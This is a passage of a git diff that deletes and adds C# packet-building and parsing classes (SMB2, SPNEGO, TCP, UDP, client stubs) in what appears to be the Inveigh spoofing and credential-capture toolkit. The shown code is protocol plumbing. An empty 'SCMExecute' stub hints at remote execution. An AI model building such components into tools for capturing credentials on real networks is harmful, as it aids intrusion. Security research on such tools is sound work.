packetWriter.Write(this.Status); - packetWriter.Write(this.Command); - packetWriter.Write(this.Credit); - packetWriter.Write(this.Flags); - packetWriter.Write(this.NextCommand); - packetWriter.Write(this.MessageId); - packetWriter.Write(this.Reserved2); - packetWriter.Write(this.TreeId); - packetWriter.Write(this.SessionId); - packetWriter.Write(this.Signature); - return memoryStream.ToArray(); - } - - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/SMB2Helper.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/SMB2Helper.cs deleted file mode 100644 index 8ef9628..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/SMB2Helper.cs +++ /dev/null @@ -1,124 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Net.Sockets; -using Quiddity.NetBIOS; -using Quiddity.Support; - -namespace Quiddity.SMB2 -{ - class SMB2Helper - { - public NetBIOSSessionService NetBIOS = new NetBIOSSessionService(); - public SMB2Header Header = new SMB2Header(); - public object Payload = new object(); - - public void Write(SMB2Helper Packet, NetworkStream Stream) - { - byte[] headerData = Packet.Header.GetBytes(); - byte[] commandData = new byte[0]; - - switch (Packet.Header.Command) - { - - case 0: - { - SMB2NegotiateResponse command = (SMB2NegotiateResponse)Packet.Payload; - commandData = command.GetBytes(); - } - break; - - case 1: - { - SMB2SessionSetupResponse command = (SMB2SessionSetupResponse)Packet.Payload; - commandData = command.GetBytes(); - } - break; - - } - - Packet.NetBIOS.Length = (ushort)(commandData.Length + 64); - byte[] netbiosData = Packet.NetBIOS.GetBytes(); - byte[] buffer = Utilities.BlockCopy(netbiosData, headerData, commandData); - Stream.Write(buffer, 0, buffer.Length); - Stream.Flush(); - } - - public static byte[] GetBytes(object smb2Command) - { - NetBIOSSessionService netBIOSSessionService = new NetBIOSSessionService(); - SMB2Header smb2Header = new SMB2Header(); - return GetBytes(netBIOSSessionService, smb2Header, smb2Command); - } - - public static byte[] GetBytes(NetBIOSSessionService netBIOSSessionService, SMB2Header smb2Header, object smb2Command) - { - byte[] headerData = smb2Header.GetBytes(); - byte[] commandData = new byte[0]; - - switch (smb2Header.Command) - { - - case 0: - { - SMB2NegotiateResponse command = (SMB2NegotiateResponse)smb2Command; - commandData = command.GetBytes(); - } - break; - - case 1: - { - SMB2SessionSetupResponse command = (SMB2SessionSetupResponse)smb2Command; - commandData = command.GetBytes(); - } - break; - - } - - netBIOSSessionService.Length = (ushort)(commandData.Length + 64); - byte[] netbiosData = netBIOSSessionService.GetBytes(); - return Utilities.BlockCopy(netbiosData, headerData, commandData); - } - - public void NegotiateProtocol() - { - - } - - public void SessionSetup() - { - - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/SMB2Packet.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/SMB2Packet.cs deleted file mode 100644 index 945d2f8..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/SMB2Packet.cs +++ /dev/null @@ -1,42 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - class SMB2Packet - { - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Structures/SMB2NegotiateContext.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Structures/SMB2NegotiateContext.cs deleted file mode 100644 index 1b94aa6..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Structures/SMB2NegotiateContext.cs +++ /dev/null @@ -1,108 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Linq; -using System.IO; - -namespace Quiddity.SMB2 -{ - class SMB2NegotiateContext - { - //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/15332256-522e-4a53-8cd7-0bd17678a2f7 - public ushort ContextType { get; set; } - public ushort DataLength { get; set; } - public uint Reserved { get; set; } - public byte[] Data { get; set; } - - public SMB2NegotiateContext() - { - this.ContextType = 0; - this.DataLength = 0; - this.Reserved = 0; - this.Data = new byte[0]; - } - - public byte[] GetBytes(string[] contextTypes) - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - - if (contextTypes.Contains("1")) - { - this.ContextType = 1; - this.DataLength = 38; - byte[] key = new byte[32]; - Random random = new Random(); - random.NextBytes(key); - this.Data = new byte[38]; - Buffer.BlockCopy(new byte[6] { 0x01, 0x00, 0x20, 0x00, 0x01, 0x00 }, 0, this.Data, 0, 6); - Buffer.BlockCopy(key, 0, this.Data, 6, key.Length); - packetWriter.Write(this.ContextType); - packetWriter.Write(this.DataLength); - packetWriter.Write(this.Reserved); - packetWriter.Write(this.Data); - packetWriter.Write(new byte[2] { 0x000, 0x00 }); - } - - if (contextTypes.Contains("2")) - { - this.ContextType = 2; - this.DataLength = 4; - this.Data = new byte[4] { 0x01, 0x00, 0x2, 0x00 }; - packetWriter.Write(this.ContextType); - packetWriter.Write(this.DataLength); - packetWriter.Write(this.Reserved); - packetWriter.Write(this.Data); - packetWriter.Write(new byte[4] { 0x000, 0x00, 0x00, 0x00 }); - } - - if (contextTypes.Contains("3")) - { - this.ContextType = 3; - this.DataLength = 12; - this.Data = new byte[12] { 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x04, 0x00 }; - packetWriter.Write(this.ContextType); - packetWriter.Write(this.DataLength); - packetWriter.Write(this.Reserved); - packetWriter.Write(this.Data); - } - - return memoryStream.ToArray(); - } - - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SPNEGO/SPNEGONegTokenInit.cs b/Inveigh/Protocols/Quiddity/Protocols/SPNEGO/SPNEGONegTokenInit.cs deleted file mode 100644 index 8e57949..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SPNEGO/SPNEGONegTokenInit.cs +++ /dev/null @@ -1,64 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.Support; - -namespace Quiddity.SPNEGO -{ - class SPNEGONegTokenInit - { - /* - https://tools.ietf.org/html/rfc4178#appendix-A - */ - public byte[] MechTypes { get; set; } - public byte[] ReqFlags { get; set; } - public byte[] MechToken { get; set; } - public byte[] MechListMIC { get; set; } - public byte[] NegHints { get; set; } - - public SPNEGONegTokenInit() - { - this.MechTypes = new byte[0]; - this.ReqFlags = new byte[10]; - this.MechToken = new byte[0]; - this.MechListMIC = new byte[0]; - this.NegHints = new byte[0]; - } - - public void Decode(byte[] data) - { - this.MechTypes = ASN1.GetTagBytes(6, data); - this.MechToken = ASN1.GetTagBytes(4, data); - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SPNEGO/SPNEGONegTokenResp.cs b/Inveigh/Protocols/Quiddity/Protocols/SPNEGO/SPNEGONegTokenResp.cs deleted file mode 100644 index 5b4e27c..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SPNEGO/SPNEGONegTokenResp.cs +++ /dev/null @@ -1,55 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ - -namespace Quiddity.SPNEGO -{ - class SPNEGONegTokenResp - { - /* - https://tools.ietf.org/html/rfc4178#appendix-A - */ - public byte NegState { get; set; } - public byte[] SupportedMech { get; set; } - public byte[] ResponseToken { get; set; } - public byte[] MechListMIC { get; set; } - - public SPNEGONegTokenResp() - { - this.NegState = 0; - this.SupportedMech = new byte[10]; // todo check - this.ResponseToken = new byte[0]; - this.MechListMIC = new byte[0]; - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/TCP/TCPHeader.cs b/Inveigh/Protocols/Quiddity/Protocols/TCP/TCPHeader.cs deleted file mode 100644 index 28c3ba9..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/TCP/TCPHeader.cs +++ /dev/null @@ -1,124 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.TCP -{ - class TCPHeader - { - // https://datatracker.ietf.org/doc/html/rfc793#section-3.1 - public ushort SourcePort { get; set; } - public ushort DestinationPort { get; set; } - public uint SequenceNumber { get; set; } - public uint AcknowledgementNumber { get; set; } - public int DataOffset { get; set; } - public int Reserved { get; set; } - public bool URG { get; set; } - public bool ACK { get; set; } - public bool PSH { get; set; } - public bool RST { get; set; } - public bool SYN { get; set; } - public bool FIN { get; set; } - public ushort Window { get; set; } - public ushort Checksum { get; set; } - public ushort UrgentPointer { get; set; } - public byte[] Options { get; set; } - public byte[] Padding { get; set; } - - // custom - public string Flags { get; set; } - - public void ReadBytes(byte[] data, int position) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = position; - this.SourcePort = packetReader.BigEndianReadUInt16(); - this.DestinationPort = packetReader.BigEndianReadUInt16(); - this.SequenceNumber = packetReader.BigEndianReadUInt32(); - this.AcknowledgementNumber = packetReader.BigEndianReadUInt32(); - this.Flags = packetReader.ReadBinary(2); - ReadFlags(); - this.Window = packetReader.BigEndianReadUInt16(); - this.Checksum = packetReader.BigEndianReadUInt16(); - this.UrgentPointer = packetReader.BigEndianReadUInt16(); - this.Options = packetReader.BigEndianReadBytes(3); - this.Padding = packetReader.BigEndianReadBytes(3); - } - - } - - protected virtual void ReadFlags() - { - this.DataOffset = Convert.ToInt32(this.Flags.Substring(0, 4), 2) * 4; - this.Reserved = Convert.ToInt32(this.Flags.Substring(4, 3), 2); - - if (string.Equals(this.Flags.Substring(10, 1), "1")) - { - this.URG = true; - } - - if (string.Equals(this.Flags.Substring(11, 1), "1")) - { - this.ACK = true; - } - - if (string.Equals(this.Flags.Substring(12, 1), "1")) - { - this.PSH = true; - } - - if (string.Equals(this.Flags.Substring(13, 1), "1")) - { - this.RST = true; - } - - if (string.Equals(this.Flags.Substring(14, 1), "1")) - { - this.SYN = true; - } - - if (string.Equals(this.Flags.Substring(15, 1), "1")) - { - this.FIN = true; - } - - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/UDP/UDPHeader.cs b/Inveigh/Protocols/Quiddity/Protocols/UDP/UDPHeader.cs deleted file mode 100644 index f6e8671..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/UDP/UDPHeader.cs +++ /dev/null @@ -1,130 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.IO; -using System.Net; - -namespace Quiddity.UDP -{ - class UDPHeader - { - // https://tools.ietf.org/html/rfc768 - public ushort SourcePort { get; set; } - public ushort DestinationPort { get; set; } - public ushort Length { get; set; } - public ushort Checksum { get; set; } - - public UDPHeader() - { - this.SourcePort = 0; - this.DestinationPort = 0; - this.Length = 0; - this.Checksum = 0; - } - - public UDPHeader(byte[] data, int offset) - { - ReadBytes(data, offset); - } - - public UDPHeader ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.SourcePort = packetReader.BigEndianReadUInt16(); - this.DestinationPort = packetReader.BigEndianReadUInt16(); - this.Length = packetReader.BigEndianReadUInt16(); - this.Checksum = packetReader.ReadUInt16(); - return this; - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.BigEndianWrite(this.SourcePort); - packetWriter.BigEndianWrite(this.DestinationPort); - packetWriter.BigEndianWrite(this.Length); - packetWriter.Write(this.Checksum); - return memoryStream.ToArray(); - } - - } - - public void IPv6Checksum(byte[] data, string clientIP, string sourceIP, int nextHeader) - { - byte[] pseudoHeader = IPv6PseudoHeader(clientIP, sourceIP, nextHeader, data.Length); - int e = 0; - - if ((pseudoHeader.Length + data.Length) % 2 != 0) - { - e = 1; - } - - byte[] packet = new byte[pseudoHeader.Length + data.Length + e]; - Buffer.BlockCopy(pseudoHeader, 0, packet, 0, pseudoHeader.Length); - Buffer.BlockCopy(data, 0, packet, pseudoHeader.Length, data.Length); - uint packetChecksum = 0; - int index = 0; - - while (index < packet.Length) - { - packetChecksum += Convert.ToUInt32(BitConverter.ToUInt16(packet, index)); - index += 2; - } - - packetChecksum = (packetChecksum >> 16) + (packetChecksum & 0xffff); - packetChecksum += (packetChecksum >> 16); - this.Checksum = (ushort)~packetChecksum; - } - - private byte[] IPv6PseudoHeader(string clientIP, string sourceIP, int nextHeader, int length) - { - byte[] lengthData = BitConverter.GetBytes(length); - Array.Reverse(lengthData); - byte[] pseudoHeader = new byte[40]; - Buffer.BlockCopy(IPAddress.Parse(sourceIP).GetAddressBytes(), 0, pseudoHeader, 0, 16); - Buffer.BlockCopy(IPAddress.Parse(clientIP).GetAddressBytes(), 0, pseudoHeader, 16, 16); - Buffer.BlockCopy(lengthData, 0, pseudoHeader, 32, 4); - pseudoHeader[39] = (byte)nextHeader; - return pseudoHeader; - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Quiddity.sln b/Inveigh/Protocols/Quiddity/Quiddity.sln new file mode 100644 index 0000000..923fb91 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity.sln @@ -0,0 +1,25 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.31129.286 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Quiddity", "Quiddity\Quiddity.csproj", "{C85B8A8C-8331-4ED2-8264-0C8BD7410E25}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Any CPU = Debug|Any CPU + Release|Any CPU = Release|Any CPU + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {C85B8A8C-8331-4ED2-8264-0C8BD7410E25}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {C85B8A8C-8331-4ED2-8264-0C8BD7410E25}.Debug|Any CPU.Build.0 = Debug|Any CPU + {C85B8A8C-8331-4ED2-8264-0C8BD7410E25}.Release|Any CPU.ActiveCfg = Release|Any CPU + {C85B8A8C-8331-4ED2-8264-0C8BD7410E25}.Release|Any CPU.Build.0 = Release|Any CPU + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {3310338C-F3E5-45E8-B437-85CA1022301C} + EndGlobalSection +EndGlobal diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Clients/SMBClient.cs b/Inveigh/Protocols/Quiddity/Quiddity/Clients/SMBClient.cs new file mode 100644 index 0000000..55ff74e --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Clients/SMBClient.cs @@ -0,0 +1,64 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.Clients +{ + class SMBClient + { + internal void Connect(string ipAddress, int port) + { + TCPClient tcpClient = new TCPClient(ipAddress, port); + tcpClient.Connect(ipAddress, port); + } + + internal void Negotiate(string ipAddress, int port) + { + + } + + internal void Authenticate(string ipAddress, int port) + { + + } + + internal void SCMExecute(string ipAddress, int port) + { + + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Clients/TCPClient.cs b/Inveigh/Protocols/Quiddity/Quiddity/Clients/TCPClient.cs new file mode 100644 index 0000000..4748eed --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Clients/TCPClient.cs @@ -0,0 +1,47 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Net; +using System.Net.Sockets; + +namespace Quiddity.Clients +{ + public class TCPClient : TcpClient + { + public TCPClient(string ipAddress, int port) : base(ipAddress, port) + { + 